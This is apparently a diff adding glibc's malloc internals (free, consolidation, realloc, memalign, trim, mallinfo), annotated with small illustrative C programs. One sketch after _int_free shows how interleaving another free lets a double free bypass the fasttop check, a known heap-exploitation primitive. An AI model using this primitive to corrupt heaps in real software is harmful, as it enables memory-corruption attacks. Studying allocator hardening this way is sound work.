+                  remainder = chunk_at_offset (victim, nb);
+
+                  /* We cannot assume the unsorted list is empty and therefore
+                     have to perform a complete insert here.  */
+                  bck = unsorted_chunks (av);
+                  fwd = bck->fd;
+		  if (__glibc_unlikely (fwd->bk != bck))
+		    malloc_printerr ("malloc(): corrupted unsorted chunks 2");
+                  remainder->bk = bck;
+                  remainder->fd = fwd;
+                  bck->fd = remainder;
+                  fwd->bk = remainder;
+
+                  /* advertise as last remainder */
+                  if (in_smallbin_range (nb))
+                    av->last_remainder = remainder;
+                  if (!in_smallbin_range (remainder_size))
+                    {
+                      remainder->fd_nextsize = NULL;
+                      remainder->bk_nextsize = NULL;
+                    }
+                  set_head (victim, nb | PREV_INUSE |
+                            (av != &main_arena ? NON_MAIN_ARENA : 0));
+                  set_head (remainder, remainder_size | PREV_INUSE);
+                  set_foot (remainder, remainder_size);
+                }
+              check_malloced_chunk (av, victim, nb);
+              void *p = chunk2mem (victim);
+              alloc_perturb (p, bytes);
+              return p;
+            }
+        }
+
+    use_top:
+      /*
+         If large enough, split off the chunk bordering the end of memory
+         (held in av->top). Note that this is in accord with the best-fit
+         search rule.  In effect, av->top is treated as larger (and thus
+         less well fitting) than any other available chunk since it can
+         be extended to be as large as necessary (up to system
+         limitations).
+
+         We require that av->top always exists (i.e., has size >=
+         MINSIZE) after initialization, so if it would otherwise be
+         exhausted by current request, it is replenished. (The main
+         reason for ensuring it exists is that we may need MINSIZE space
+         to put in fenceposts in sysmalloc.)
+       */
+
+      victim = av->top;
+      size = chunksize (victim);
+
+      if (__glibc_unlikely (size > av->system_mem))
+        malloc_printerr ("malloc(): corrupted top size");
+
+      if ((unsigned long) (size) >= (unsigned long) (nb + MINSIZE))
+        {
+          remainder_size = size - nb;
+          remainder = chunk_at_offset (victim, nb);
+          av->top = remainder;
+          set_head (victim, nb | PREV_INUSE |
+                    (av != &main_arena ? NON_MAIN_ARENA : 0));
+          set_head (remainder, remainder_size | PREV_INUSE);
+
+          check_malloced_chunk (av, victim, nb);
+          void *p = chunk2mem (victim);
+          alloc_perturb (p, bytes);
+          return p;
+        }
+
+      /* When we are using atomic ops to free fast chunks we can get
+         here for all block sizes.  */
+      else if (atomic_load_relaxed (&av->have_fastchunks))
+        {
+          malloc_consolidate (av);
+          /* restore original bin index */
+          if (in_smallbin_range (nb))
+            idx = smallbin_index (nb);
+          else
+            idx = largebin_index (nb);
+        }
+
+      /*
+         Otherwise, relay to handle system-dependent cases
+       */
+      else
+        {
+          void *p = sysmalloc (nb, av);
+          if (p != NULL)
+            alloc_perturb (p, bytes);
+          return p;
+        }
+    }
+}
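
The checked_request2size conversion at the top of _int_malloc means the chunk actually carved out is the request plus SIZE_SZ of overhead, rounded up to MALLOC_ALIGNMENT and never below MINSIZE. malloc_usable_size makes that rounding visible; the expected numbers in the comment assume the usual 64-bit layout (SIZE_SZ 8, MALLOC_ALIGNMENT 16):

#include <malloc.h>
#include <stdio.h>
#include <stdlib.h>

int main (void)
{
  /* On 64-bit: requests 1..24 -> 24 usable, 25..40 -> 40, 41..56 -> 56, ...  */
  size_t requests[] = { 1, 24, 25, 40, 41, 100 };

  for (size_t i = 0; i < sizeof requests / sizeof requests[0]; i++)
    {
      void *p = malloc (requests[i]);
      printf ("request %3zu -> usable %3zu\n",
              requests[i], malloc_usable_size (p));
      free (p);
    }
  return 0;
}
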
+
+/*
+   ------------------------------ free ------------------------------
+ */
+
+static void
+_int_free (mstate av, mchunkptr p, int have_lock)
+{
+  INTERNAL_SIZE_T size;        /* its size */
+  mfastbinptr *fb;             /* associated fastbin */
+  mchunkptr nextchunk;         /* next contiguous chunk */
+  INTERNAL_SIZE_T nextsize;    /* its size */
+  int nextinuse;               /* true if nextchunk is used */
+  INTERNAL_SIZE_T prevsize;    /* size of previous contiguous chunk */
+  mchunkptr bck;               /* misc temp for linking */
+  mchunkptr fwd;               /* misc temp for linking */
+
+  size = chunksize (p);
+
+  /* Little security check which won't hurt performance: the
+     allocator never wraps around at the end of the address space.
+     Therefore we can exclude some size values which might appear
+     here by accident or by "design" from some intruder.  */
+  if (__builtin_expect ((uintptr_t) p > (uintptr_t) -size, 0)
+      || __builtin_expect (misaligned_chunk (p), 0))
+    malloc_printerr ("free(): invalid pointer");
+  /* We know that each chunk is at least MINSIZE bytes in size or a
+     multiple of MALLOC_ALIGNMENT.  */
+  if (__glibc_unlikely (size < MINSIZE || !aligned_OK (size)))
+    malloc_printerr ("free(): invalid size");
+
+  check_inuse_chunk(av, p);
+
+#if USE_TCACHE
+  {
+    size_t tc_idx = csize2tidx (size);
+    if (tcache != NULL && tc_idx < mp_.tcache_bins)
+      {
+	/* Check to see if it's already in the tcache.  */
+	tcache_entry *e = (tcache_entry *) chunk2mem (p);
+
+	/* This test succeeds on double free.  However, we don't 100%
+	   trust it (it also matches random payload data at a 1 in
+	   2^<size_t> chance), so verify it's not an unlikely
+	   coincidence before aborting.  */
+	if (__glibc_unlikely (e->key == tcache))
+	  {
+	    tcache_entry *tmp;
+	    LIBC_PROBE (memory_tcache_double_free, 2, e, tc_idx);
+	    for (tmp = tcache->entries[tc_idx];
+		 tmp;
+		 tmp = tmp->next)
+	      if (tmp == e)
+		malloc_printerr ("free(): double free detected in tcache 2");
+	    /* If we get here, it was a coincidence.  We've wasted a
+	       few cycles, but don't abort.  */
+	  }
+
+	if (tcache->counts[tc_idx] < mp_.tcache_count)
+	  {
+	    tcache_put (p, tc_idx);
+	    return;
+	  }
+      }
+  }
+#endif
+
+  /*
+    If eligible, place chunk on a fastbin so it can be found
+    and used quickly in malloc.
+  */
+
+  if ((unsigned long)(size) <= (unsigned long)(get_max_fast ())
+
+#if TRIM_FASTBINS
+      /*
+	If TRIM_FASTBINS set, don't place chunks
+	bordering top into fastbins
+      */
+      && (chunk_at_offset(p, size) != av->top)
+#endif
+      ) {
+
+    if (__builtin_expect (chunksize_nomask (chunk_at_offset (p, size))
+			  <= 2 * SIZE_SZ, 0)
+	|| __builtin_expect (chunksize (chunk_at_offset (p, size))
+			     >= av->system_mem, 0))
+      {
+	bool fail = true;
+	/* We might not have a lock at this point and concurrent modifications
+	   of system_mem might result in a false positive.  Redo the test after
+	   getting the lock.  */
+	if (!have_lock)
+	  {
+	    __libc_lock_lock (av->mutex);
+	    fail = (chunksize_nomask (chunk_at_offset (p, size)) <= 2 * SIZE_SZ
+		    || chunksize (chunk_at_offset (p, size)) >= av->system_mem);
+	    __libc_lock_unlock (av->mutex);
+	  }
+
+	if (fail)
+	  malloc_printerr ("free(): invalid next size (fast)");
+      }
+
+    free_perturb (chunk2mem(p), size - 2 * SIZE_SZ);
+
+    atomic_store_relaxed (&av->have_fastchunks, true);
+    unsigned int idx = fastbin_index(size);
+    fb = &fastbin (av, idx);
+
+    /* Atomically link P to its fastbin: P->FD = *FB; *FB = P;  */
+    mchunkptr old = *fb, old2;
+
+    if (SINGLE_THREAD_P)
+      {
+	/* Check that the top of the bin is not the record we are going to
+	   add (i.e., double free).  */
+	if (__builtin_expect (old == p, 0))
+	  malloc_printerr ("double free or corruption (fasttop)");
+	p->fd = old;
+	*fb = p;
+      }
+    else
+      do
+	{
+	  /* Check that the top of the bin is not the record we are going to
+	     add (i.e., double free).  */
+	  if (__builtin_expect (old == p, 0))
+	    malloc_printerr ("double free or corruption (fasttop)");
+	  p->fd = old2 = old;
+	}
+      while ((old = catomic_compare_and_exchange_val_rel (fb, p, old2))
+	     != old2);
+
+    /* Check that size of fastbin chunk at the top is the same as
+       size of the chunk that we are adding.  We can dereference OLD
+       only if we have the lock, otherwise it might have already been
+       allocated again.  */
+    if (have_lock && old != NULL
+	&& __builtin_expect (fastbin_index (chunksize (old)) != idx, 0))
+      malloc_printerr ("invalid fastbin entry (free)");
+  }
+
+  /*
+    Consolidate other non-mmapped chunks as they arrive.
+  */
+
+  else if (!chunk_is_mmapped(p)) {
+
+    /* If we're single-threaded, don't lock the arena.  */
+    if (SINGLE_THREAD_P)
+      have_lock = true;
+
+    if (!have_lock)
+      __libc_lock_lock (av->mutex);
+
+    nextchunk = chunk_at_offset(p, size);
+
+    /* Lightweight tests: check whether the block is already the
+       top block.  */
+    if (__glibc_unlikely (p == av->top))
+      malloc_printerr ("double free or corruption (top)");
+    /* Or whether the next chunk is beyond the boundaries of the arena.  */
+    if (__builtin_expect (contiguous (av)
+			  && (char *) nextchunk
+			  >= ((char *) av->top + chunksize(av->top)), 0))
+	malloc_printerr ("double free or corruption (out)");
+    /* Or whether the block is actually not marked used.  */
+    if (__glibc_unlikely (!prev_inuse(nextchunk)))
+      malloc_printerr ("double free or corruption (!prev)");
+
+    nextsize = chunksize(nextchunk);
+    if (__builtin_expect (chunksize_nomask (nextchunk) <= 2 * SIZE_SZ, 0)
+	|| __builtin_expect (nextsize >= av->system_mem, 0))
+      malloc_printerr ("free(): invalid next size (normal)");
+
+    free_perturb (chunk2mem(p), size - 2 * SIZE_SZ);
+
+    /* consolidate backward */
+    if (!prev_inuse(p)) {
+      prevsize = prev_size (p);
+      size += prevsize;
+      p = chunk_at_offset(p, -((long) prevsize));
+      if (__glibc_unlikely (chunksize(p) != prevsize))
+        malloc_printerr ("corrupted size vs. prev_size while consolidating");
+      unlink_chunk (av, p);
+    }
+
+    if (nextchunk != av->top) {
+      /* get and clear inuse bit */
+      nextinuse = inuse_bit_at_offset(nextchunk, nextsize);
+
+      /* consolidate forward */
+      if (!nextinuse) {
+	unlink_chunk (av, nextchunk);
+	size += nextsize;
+      } else
+	clear_inuse_bit_at_offset(nextchunk, 0);
+
+      /*
+	Place the chunk in unsorted chunk list. Chunks are
+	not placed into regular bins until after they have
+	been given one chance to be used in malloc.
+      */
+
+      bck = unsorted_chunks(av);
+      fwd = bck->fd;
+      if (__glibc_unlikely (fwd->bk != bck))
+	malloc_printerr ("free(): corrupted unsorted chunks");
+      p->fd = fwd;
+      p->bk = bck;
+      if (!in_smallbin_range(size))
+	{
+	  p->fd_nextsize = NULL;
+	  p->bk_nextsize = NULL;
+	}
+      bck->fd = p;
+      fwd->bk = p;
+
+      set_head(p, size | PREV_INUSE);
+      set_foot(p, size);
+
+      check_free_chunk(av, p);
+    }
+
+    /*
+      If the chunk borders the current high end of memory,
+      consolidate into top
+    */
+
+    else {
+      size += nextsize;
+      set_head(p, size | PREV_INUSE);
+      av->top = p;
+      check_chunk(av, p);
+    }
+
+    /*
+      If freeing a large space, consolidate possibly-surrounding
+      chunks. Then, if the total unused topmost memory exceeds trim
+      threshold, ask malloc_trim to reduce top.
+
+      Unless max_fast is 0, we don't know if there are fastbins
+      bordering top, so we cannot tell for sure whether threshold
+      has been reached unless fastbins are consolidated.  But we
+      don't want to consolidate on each free.  As a compromise,
+      consolidation is performed if FASTBIN_CONSOLIDATION_THRESHOLD
+      is reached.
+    */
+
+    if ((unsigned long)(size) >= FASTBIN_CONSOLIDATION_THRESHOLD) {
+      if (atomic_load_relaxed (&av->have_fastchunks))
+	malloc_consolidate(av);
+
+      if (av == &main_arena) {
+#ifndef MORECORE_CANNOT_TRIM
+	if ((unsigned long)(chunksize(av->top)) >=
+	    (unsigned long)(mp_.trim_threshold))
+	  systrim(mp_.top_pad, av);
+#endif
+      } else {
+	/* Always try heap_trim(), even if the top chunk is not
+	   large, because the corresponding heap might go away.  */
+	heap_info *heap = heap_for_ptr(top(av));
+
+	assert(heap->ar_ptr == av);
+	heap_trim(heap, mp_.top_pad);
+      }
+    }
+
+    if (!have_lock)
+      __libc_lock_unlock (av->mutex);
+  }
+  /*
+    If the chunk was allocated via mmap, release via munmap().
+  */
+
+  else {
+    munmap_chunk (p);
+  }
+}
+
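+/*
+   Illustrative sketch, not from the glibc sources: the fasttop check above
+   only compares a freed chunk against the current top of its fastbin, so an
+   immediate double free aborts, while a double free with one other free in
+   between is not caught here.  Assumes fastbin-sized requests that reach
+   _int_free directly, i.e. a build without tcache or with the tcache for
+   this size already full.
+
+   #include <stdlib.h>
+
+   int main (void)
+   {
+     void *a = malloc (0x20);
+     void *b = malloc (0x20);
+
+     free (a);
+     // free (a);   // again right away: "double free or corruption (fasttop)"
+     free (b);      // b becomes the fastbin top
+     free (a);      // a != top, so the fasttop check above does not fire
+     return 0;
+   }
+*/
+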
+/*
+  ------------------------- malloc_consolidate -------------------------
+
+  malloc_consolidate is a specialized version of free() that tears
+  down chunks held in fastbins.  Free itself cannot be used for this
+  purpose since, among other things, it might place chunks back onto
+  fastbins.  So, instead, we need to use a minor variant of the same
+  code.
+*/
+
+static void malloc_consolidate(mstate av)
+{
+  mfastbinptr*    fb;                 /* current fastbin being consolidated */
+  mfastbinptr*    maxfb;              /* last fastbin (for loop control) */
+  mchunkptr       p;                  /* current chunk being consolidated */
+  mchunkptr       nextp;              /* next chunk to consolidate */
+  mchunkptr       unsorted_bin;       /* bin header */
+  mchunkptr       first_unsorted;     /* chunk to link to */
+
+  /* These have same use as in free() */
+  mchunkptr       nextchunk;
+  INTERNAL_SIZE_T size;
+  INTERNAL_SIZE_T nextsize;
+  INTERNAL_SIZE_T prevsize;
+  int             nextinuse;
+
+  atomic_store_relaxed (&av->have_fastchunks, false);
+
+  unsorted_bin = unsorted_chunks(av);
+
+  /*
+    Remove each chunk from fast bin and consolidate it, placing it
+    then in unsorted bin. Among other reasons for doing this,
+    placing in unsorted bin avoids needing to calculate actual bins
+    until malloc is sure that chunks aren't immediately going to be
+    reused anyway.
+  */
+
+  maxfb = &fastbin (av, NFASTBINS - 1);
+  fb = &fastbin (av, 0);
+  do {
+    p = atomic_exchange_acq (fb, NULL);
+    if (p != 0) {
+      do {
+	{
+	  unsigned int idx = fastbin_index (chunksize (p));
+	  if ((&fastbin (av, idx)) != fb)
+	    malloc_printerr ("malloc_consolidate(): invalid chunk size");
+	}
+
+	check_inuse_chunk(av, p);
+	nextp = p->fd;
+
+	/* Slightly streamlined version of consolidation code in free() */
+	size = chunksize (p);
+	nextchunk = chunk_at_offset(p, size);
+	nextsize = chunksize(nextchunk);
+
+	if (!prev_inuse(p)) {
+	  prevsize = prev_size (p);
+	  size += prevsize;
+	  p = chunk_at_offset(p, -((long) prevsize));
+	  if (__glibc_unlikely (chunksize(p) != prevsize))
+	    malloc_printerr ("corrupted size vs. prev_size in fastbins");
+	  unlink_chunk (av, p);
+	}
+
+	if (nextchunk != av->top) {
+	  nextinuse = inuse_bit_at_offset(nextchunk, nextsize);
+
+	  if (!nextinuse) {
+	    size += nextsize;
+	    unlink_chunk (av, nextchunk);
+	  } else
+	    clear_inuse_bit_at_offset(nextchunk, 0);
+
+	  first_unsorted = unsorted_bin->fd;
+	  unsorted_bin->fd = p;
+	  first_unsorted->bk = p;
+
+	  if (!in_smallbin_range (size)) {
+	    p->fd_nextsize = NULL;
+	    p->bk_nextsize = NULL;
+	  }
+
+	  set_head(p, size | PREV_INUSE);
+	  p->bk = unsorted_bin;
+	  p->fd = first_unsorted;
+	  set_foot(p, size);
+	}
+
+	else {
+	  size += nextsize;
+	  set_head(p, size | PREV_INUSE);
+	  av->top = p;
+	}
+
+      } while ( (p = nextp) != 0);
+
+    }
+  } while (fb++ != maxfb);
+}
+
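+/*
+   Illustrative sketch, not from the glibc sources: one way to observe
+   malloc_consolidate from user code is to watch mallinfo()'s fsmblks field,
+   which counts the bytes currently held in fastbins.  Freeing a chunk whose
+   (possibly merged) size reaches FASTBIN_CONSOLIDATION_THRESHOLD (64 KiB)
+   runs the consolidation branch of _int_free above.  Assumes a build without
+   tcache, so that the small free actually lands in a fastbin; with tcache
+   enabled, fsmblks simply stays 0.
+
+   #include <malloc.h>
+   #include <stdio.h>
+   #include <stdlib.h>
+
+   int main (void)
+   {
+     void *big = malloc (0x18000);        // large, but below the mmap threshold
+     free (malloc (0x20));                // parked in a fastbin
+
+     int before = mallinfo ().fsmblks;
+     free (big);                          // >= 64 KiB: fastbins get consolidated
+     int after = mallinfo ().fsmblks;
+
+     printf ("fastbin bytes before/after the large free: %d/%d\n", before, after);
+     return 0;
+   }
+*/
+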
+/*
+  ------------------------------ realloc ------------------------------
+*/
+
+void*
+_int_realloc(mstate av, mchunkptr oldp, INTERNAL_SIZE_T oldsize,
+	     INTERNAL_SIZE_T nb)
+{
+  mchunkptr        newp;            /* chunk to return */
+  INTERNAL_SIZE_T  newsize;         /* its size */
+  void*          newmem;          /* corresponding user mem */
+
+  mchunkptr        next;            /* next contiguous chunk after oldp */
+
+  mchunkptr        remainder;       /* extra space at end of newp */
+  unsigned long    remainder_size;  /* its size */
+
+  /* oldmem size */
+  if (__builtin_expect (chunksize_nomask (oldp) <= 2 * SIZE_SZ, 0)
+      || __builtin_expect (oldsize >= av->system_mem, 0))
+    malloc_printerr ("realloc(): invalid old size");
+
+  check_inuse_chunk (av, oldp);
+
+  /* All callers already filter out mmap'ed chunks.  */
+  assert (!chunk_is_mmapped (oldp));
+
+  next = chunk_at_offset (oldp, oldsize);
+  INTERNAL_SIZE_T nextsize = chunksize (next);
+  if (__builtin_expect (chunksize_nomask (next) <= 2 * SIZE_SZ, 0)
+      || __builtin_expect (nextsize >= av->system_mem, 0))
+    malloc_printerr ("realloc(): invalid next size");
+
+  if ((unsigned long) (oldsize) >= (unsigned long) (nb))
+    {
+      /* already big enough; split below */
+      newp = oldp;
+      newsize = oldsize;
+    }
+
+  else
+    {
+      /* Try to expand forward into top */
+      if (next == av->top &&
+          (unsigned long) (newsize = oldsize + nextsize) >=
+          (unsigned long) (nb + MINSIZE))
+        {
+          set_head_size (oldp, nb | (av != &main_arena ? NON_MAIN_ARENA : 0));
+          av->top = chunk_at_offset (oldp, nb);
+          set_head (av->top, (newsize - nb) | PREV_INUSE);
+          check_inuse_chunk (av, oldp);
+          return chunk2mem (oldp);
+        }
+
+      /* Try to expand forward into next chunk;  split off remainder below */
+      else if (next != av->top &&
+               !inuse (next) &&
+               (unsigned long) (newsize = oldsize + nextsize) >=
+               (unsigned long) (nb))
+        {
+          newp = oldp;
+          unlink_chunk (av, next);
+        }
+
+      /* allocate, copy, free */
+      else
+        {
+          newmem = _int_malloc (av, nb - MALLOC_ALIGN_MASK);
+          if (newmem == 0)
+            return 0; /* propagate failure */
+
+          newp = mem2chunk (newmem);
+          newsize = chunksize (newp);
+
+          /*
+             Avoid copy if newp is next chunk after oldp.
+           */
+          if (newp == next)
+            {
+              newsize += oldsize;
+              newp = oldp;
+            }
+          else
+            {
+	      memcpy (newmem, chunk2mem (oldp), oldsize - SIZE_SZ);
+              _int_free (av, oldp, 1);
+              check_inuse_chunk (av, newp);
+              return chunk2mem (newp);
+            }
+        }
+    }
+
+  /* If possible, free extra space in old or extended chunk */
+
+  assert ((unsigned long) (newsize) >= (unsigned long) (nb));
+
+  remainder_size = newsize - nb;
+
+  if (remainder_size < MINSIZE)   /* not enough extra to split off */
+    {
+      set_head_size (newp, newsize | (av != &main_arena ? NON_MAIN_ARENA : 0));
+      set_inuse_bit_at_offset (newp, newsize);
+    }
+  else   /* split remainder */
+    {
+      remainder = chunk_at_offset (newp, nb);
+      set_head_size (newp, nb | (av != &main_arena ? NON_MAIN_ARENA : 0));
+      set_head (remainder, remainder_size | PREV_INUSE |
+                (av != &main_arena ? NON_MAIN_ARENA : 0));
+      /* Mark remainder as inuse so free() won't complain */
+      set_inuse_bit_at_offset (remainder, remainder_size);
+      _int_free (av, remainder, 1);
+    }
+
+  check_inuse_chunk (av, newp);
+  return chunk2mem (newp);
+}
+
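+/*
+   Illustrative sketch, not from the glibc sources: seen from the caller,
+   _int_realloc either shrinks in place, grows in place (into the top chunk
+   or a free neighbour), or falls back to the allocate/copy/free path above;
+   in every case the old contents survive up to the smaller of the two sizes.
+
+   #include <stdio.h>
+   #include <stdlib.h>
+   #include <string.h>
+
+   int main (void)
+   {
+     char *p = malloc (24);
+     strcpy (p, "hello");
+
+     char *q = realloc (p, 4096);   // may extend in place or move the data
+     printf ("still says: %s\n", q);
+
+     free (q);
+     return 0;
+   }
+*/
+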
+/*
+   ------------------------------ memalign ------------------------------
+ */
+
+static void *
+_int_memalign (mstate av, size_t alignment, size_t bytes)
+{
+  INTERNAL_SIZE_T nb;             /* padded  request size */
+  char *m;                        /* memory returned by malloc call */
+  mchunkptr p;                    /* corresponding chunk */
+  char *brk;                      /* alignment point within p */
+  mchunkptr newp;                 /* chunk to return */
+  INTERNAL_SIZE_T newsize;        /* its size */
+  INTERNAL_SIZE_T leadsize;       /* leading space before alignment point */
+  mchunkptr remainder;            /* spare room at end to split off */
+  unsigned long remainder_size;   /* its size */
+  INTERNAL_SIZE_T size;
+
+
+
+  checked_request2size (bytes, nb);
+
+  /*
+     Strategy: find a spot within that chunk that meets the alignment
+     request, and then possibly free the leading and trailing space.
+   */
+
+
+  /* Check for overflow.  */
+  if (nb > SIZE_MAX - alignment - MINSIZE)
+    {
+      __set_errno (ENOMEM);
+      return 0;
+    }
+
+  /* Call malloc with worst case padding to hit alignment. */
+
+  m = (char *) (_int_malloc (av, nb + alignment + MINSIZE));
+
+  if (m == 0)
+    return 0;           /* propagate failure */
+
+  p = mem2chunk (m);
+
+  if ((((unsigned long) (m)) % alignment) != 0)   /* misaligned */
+
+    { /*
+                Find an aligned spot inside chunk.  Since we need to give back
+                leading space in a chunk of at least MINSIZE, if the first
+                calculation places us at a spot with less than MINSIZE leader,
+                we can move to the next aligned spot -- we've allocated enough
+                total room so that this is always possible.
+                 */
+      brk = (char *) mem2chunk (((unsigned long) (m + alignment - 1)) &
+                                - ((signed long) alignment));
+      if ((unsigned long) (brk - (char *) (p)) < MINSIZE)
+        brk += alignment;
+
+      newp = (mchunkptr) brk;
+      leadsize = brk - (char *) (p);
+      newsize = chunksize (p) - leadsize;
+
+      /* For mmapped chunks, just adjust offset */
+      if (chunk_is_mmapped (p))
+        {
+          set_prev_size (newp, prev_size (p) + leadsize);
+          set_head (newp, newsize | IS_MMAPPED);
+          return chunk2mem (newp);
+        }
+
+      /* Otherwise, give back leader, use the rest */
+      set_head (newp, newsize | PREV_INUSE |
+                (av != &main_arena ? NON_MAIN_ARENA : 0));
+      set_inuse_bit_at_offset (newp, newsize);
+      set_head_size (p, leadsize | (av != &main_arena ? NON_MAIN_ARENA : 0));
+      _int_free (av, p, 1);
+      p = newp;
+
+      assert (newsize >= nb &&
+              (((unsigned long) (chunk2mem (p))) % alignment) == 0);
+    }
+
+  /* Also give back spare room at the end */
+  if (!chunk_is_mmapped (p))
+    {
+      size = chunksize (p);
+      if ((unsigned long) (size) > (unsigned long) (nb + MINSIZE))
+        {
+          remainder_size = size - nb;
+          remainder = chunk_at_offset (p, nb);
+          set_head (remainder, remainder_size | PREV_INUSE |
+                    (av != &main_arena ? NON_MAIN_ARENA : 0));
+          set_head_size (p, nb);
+          _int_free (av, remainder, 1);
+        }
+    }
+
+  check_inuse_chunk (av, p);
+  return chunk2mem (p);
+}
+
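+/*
+   Illustrative sketch, not from the glibc sources: _int_memalign over-allocates
+   by alignment + MINSIZE, picks an aligned spot inside the oversized chunk and
+   gives the leading and trailing slack back, so the caller just sees an aligned
+   pointer that can be passed to free() as usual.
+
+   #include <malloc.h>
+   #include <stdint.h>
+   #include <stdio.h>
+   #include <stdlib.h>
+
+   int main (void)
+   {
+     void *p = memalign (0x1000, 100);   // request 4 KiB alignment
+     printf ("%p %s page aligned\n", p,
+             ((uintptr_t) p & 0xfff) == 0 ? "is" : "is not");
+     free (p);
+     return 0;
+   }
+*/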
+
+/*
+   ------------------------------ malloc_trim ------------------------------
+ */
+
+static int
+mtrim (mstate av, size_t pad)
+{
+  /* Ensure all blocks are consolidated.  */
+  malloc_consolidate (av);
+
+  const size_t ps = GLRO (dl_pagesize);
+  int psindex = bin_index (ps);
+  const size_t psm1 = ps - 1;
+
+  int result = 0;
+  for (int i = 1; i < NBINS; ++i)
+    if (i == 1 || i >= psindex)
+      {
+        mbinptr bin = bin_at (av, i);
+
+        for (mchunkptr p = last (bin); p != bin; p = p->bk)
+          {
+            INTERNAL_SIZE_T size = chunksize (p);
+
+            if (size > psm1 + sizeof (struct malloc_chunk))
+              {
+                /* See whether the chunk contains at least one unused page.  */
+                char *paligned_mem = (char *) (((uintptr_t) p
+                                                + sizeof (struct malloc_chunk)
+                                                + psm1) & ~psm1);
+
+                assert ((char *) chunk2mem (p) + 4 * SIZE_SZ <= paligned_mem);
+                assert ((char *) p + size > paligned_mem);
+
+                /* This is the size we could potentially free.  */
+                size -= paligned_mem - (char *) p;
+
+                if (size > psm1)
+                  {
+#if MALLOC_DEBUG
+                    /* When debugging we simulate destroying the memory
+                       content.  */
+                    memset (paligned_mem, 0x89, size & ~psm1);
+#endif
+                    __madvise (paligned_mem, size & ~psm1, MADV_DONTNEED);
+
+                    result = 1;
+                  }
+              }
+          }
+      }
+
+#ifndef MORECORE_CANNOT_TRIM
+  return result | (av == &main_arena ? systrim (pad, av) : 0);
+
+#else
+  return result;
+#endif
+}
+
+
+int
+__malloc_trim (size_t s)
+{
+  int result = 0;
+
+  if (__malloc_initialized < 0)
+    ptmalloc_init ();
+
+  mstate ar_ptr = &main_arena;
+  do
+    {
+      __libc_lock_lock (ar_ptr->mutex);
+      result |= mtrim (ar_ptr, s);
+      __libc_lock_unlock (ar_ptr->mutex);
+
+      ar_ptr = ar_ptr->next;
+    }
+  while (ar_ptr != &main_arena);
+
+  return result;
+}
+
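+/*
+   Illustrative sketch, not from the glibc sources: malloc_trim(0) walks every
+   arena, consolidates, madvise()s whole unused pages inside binned chunks and
+   trims the main arena's top via systrim, returning 1 if anything could be
+   handed back to the kernel.
+
+   #include <malloc.h>
+   #include <stdio.h>
+   #include <stdlib.h>
+
+   int main (void)
+   {
+     void *blocks[64];
+     for (int i = 0; i < 64; i++)        // grow the heap a little
+       blocks[i] = malloc (4000);
+     for (int i = 0; i < 64; i++)
+       free (blocks[i]);
+
+     printf ("released memory: %s\n", malloc_trim (0) ? "yes" : "no");
+     return 0;
+   }
+*/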
+
+/*
+   ------------------------- malloc_usable_size -------------------------
+ */
+
+static size_t
+musable (void *mem)
+{
+  mchunkptr p;
+  if (mem != 0)
+    {
+      p = mem2chunk (mem);
+
+      if (__builtin_expect (using_malloc_checking == 1, 0))
+        return malloc_check_get_size (p);
+
+      if (chunk_is_mmapped (p))
+	{
+	  if (DUMPED_MAIN_ARENA_CHUNK (p))
+	    return chunksize (p) - SIZE_SZ;
+	  else
+	    return chunksize (p) - 2 * SIZE_SZ;
+	}
+      else if (inuse (p))
+        return chunksize (p) - SIZE_SZ;
+    }
+  return 0;
+}
+
+
+size_t
+__malloc_usable_size (void *m)
+{
+  size_t result;
+
+  result = musable (m);
+  return result;
+}
+
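+/*
+   Illustrative sketch, not from the glibc sources: the usable size reported
+   here is the chunk size minus its header, so it is usually somewhat larger
+   than the size that was requested.
+
+   #include <malloc.h>
+   #include <stdio.h>
+   #include <stdlib.h>
+
+   int main (void)
+   {
+     void *p = malloc (100);
+     printf ("requested 100, usable %zu\n", malloc_usable_size (p));
+     free (p);
+     return 0;
+   }
+*/
+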
+/*
+   ------------------------------ mallinfo ------------------------------
+   Accumulate malloc statistics for arena AV into M.
+ */
+
+static void
+int_mallinfo (mstate av, struct mallinfo *m)
+{
+  size_t i;
+  mbinptr b;
+  mchunkptr p;
+  INTERNAL_SIZE_T avail;
+  INTERNAL_SIZE_T fastavail;
+  int nblocks;
+  int nfastblocks;
+
+  check_malloc_state (av);
+
+  /* Account for top */
+  avail = chunksize (av->top);
+  nblocks = 1;  /* top always exists */
+
+  /* traverse fastbins */
+  nfastblocks = 0;
+  fastavail = 0;
+
+  for (i = 0; i < NFASTBINS; ++i)
+    {
+      for (p = fastbin (av, i); p != 0; p = p->fd)
+        {
+          ++nfastblocks;
+          fastavail += chunksize (p);
+        }
+    }
+
+  avail += fastavail;
+
+  /* traverse regular bins */
+  for (i = 1; i < NBINS; ++i)
+    {
+      b = bin_at (av, i);
+      for (p = last (b); p != b; p = p->bk)
+        {
+          ++nblocks;
+          avail += chunksize (p);
+        }
+    }
+
+  m->smblks += nfastblocks;
+  m->ordblks += nblocks;
+  m->fordblks += avail;
+  m->uordblks += av->system_mem - avail;
+  m->arena += av->system_mem;
+  m->fsmblks += fastavail;
+  if (av == &main_arena)
+    {
+      m->hblks = mp_.n_mmaps;
+      m->hblkhd = mp_.mmapped_mem;
+      m->usmblks = 0;
+      m->keepcost = chunksize (av->top);
+    }
+}
+
+
+struct mallinfo
+__libc_mallinfo (void)
+{
+  struct mallinfo m;
+  mstate ar_ptr;
+
+  if (__malloc_initialized < 0)
+    ptmalloc_init ();
+
+  memset (&m, 0, sizeof (m));
+  ar_ptr = &main_arena;
+  do
+    {
+      __libc_lock_lock (ar_ptr->mutex);
+      int_mallinfo (ar_ptr, &m);
+      __libc_lock_unlock (ar_ptr->mutex);
+
+      ar_ptr = ar_ptr->next;
+    }
+  while (ar_ptr != &main_arena);
+
+  return m;
+}
+
+/*
+   ------------------------------ malloc_stats ------------------------------
+ */
+
+void
+__malloc_stats (void)
+{
+  int i;
+  mstate ar_ptr;
+  unsigned int in_use_b = mp_.mmapped_mem, system_b = in_use_b;
+
+  if (__malloc_initialized < 0)
+    ptmalloc_init ();
+  _IO_flockfile (stderr);
+  int old_flags2 = stderr->_flags2;
+  stderr->_flags2 |= _IO_FLAGS2_NOTCANCEL;
+  for (i = 0, ar_ptr = &main_arena;; i++)
+    {
+      struct mallinfo mi;
+
+      memset (&mi, 0, sizeof (mi));
+      __libc_lock_lock (ar_ptr->mutex);
+      int_mallinfo (ar_ptr, &mi);
+      fprintf (stderr, "Arena %d:\n", i);
+      fprintf (stderr, "system bytes     = %10u\n", (unsigned int) mi.arena);
+      fprintf (stderr, "in use bytes     = %10u\n", (unsigned int) mi.uordblks);
+#if MALLOC_DEBUG > 1
+      if (i > 0)
